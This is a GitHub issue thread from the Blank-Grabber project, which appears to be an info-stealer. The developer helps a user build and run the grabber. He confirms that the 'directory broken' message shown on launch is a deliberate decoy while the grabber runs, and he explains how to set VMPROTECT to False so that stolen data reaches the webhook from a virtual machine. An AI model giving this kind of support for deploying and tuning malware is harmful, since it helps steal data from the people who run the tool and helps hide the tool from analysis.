### ISSUE TITLE
Folder doesnt open

### ISSUE THREAD

**Issue by Gaminguide1000** [Blank-c/Blank-Grabber#26] opened 2022-05-26 23:47 UTC
The Folder doesnt open, after running the "run" command. The "run.bat" fails to call the "convert.bat".

**Comment by Gaminguide1000** [comment] 2022-05-26 23:47
Runnig only the "convert.bat" works btw

**Comment by Gaminguide1000** [comment] 2022-05-26 23:54
After running convert.bat it works, or the grabber gets made, but it says when running that the directory is broken and unreadable

**Comment by Blank-c** [comment] 2022-05-27 02:39
1) Wdym by folder doesn't open?
2) The run should work, but I'll recheck
3) the broken message is intentional, actually the grabber is running.

**Comment by Blank-c** [comment] 2022-05-27 02:48
Ok from what I noticed, github is not downloading the pyinstaller folder which is causing the error

So I have am going to attach the binaries in releases

**Comment by Blank-c** [comment] 2022-05-27 04:25
The problem is fixed @Gamingguide1000 download again

**Comment by Gaminguide1000** [comment] 2022-05-27 12:41
So, works now. Still, on VM nothing gets sent to the webhook

**Comment by Blank-c** [comment] 2022-05-27 13:57
@Gaminguide1000 it has vmprotect, check the main.py and turn it off

**Comment by Blank-c** [comment] 2022-05-27 14:04
![image](https://user-images.githubusercontent.com/94945186/170714859-33cf935f-7291-41d4-87da-86244a54f0e6.png)
[Blank Grabber/Data/main.py](https://github.com/Blank-c/Blank-Grabber/blob/main/Blank%20Grabber/Data/main.py#L5)

**Comment by Blank-c** [comment] 2022-05-27 21:21
turn it to ```python
VMPROTECT = False
```

**Comment by Blank-c** [comment] 2022-06-01 03:44
@Gaminguide1000 I am closing this issue, if you have some problems, post it in #30

**Closed by Blank-c** 2022-06-01 03:44 UTC
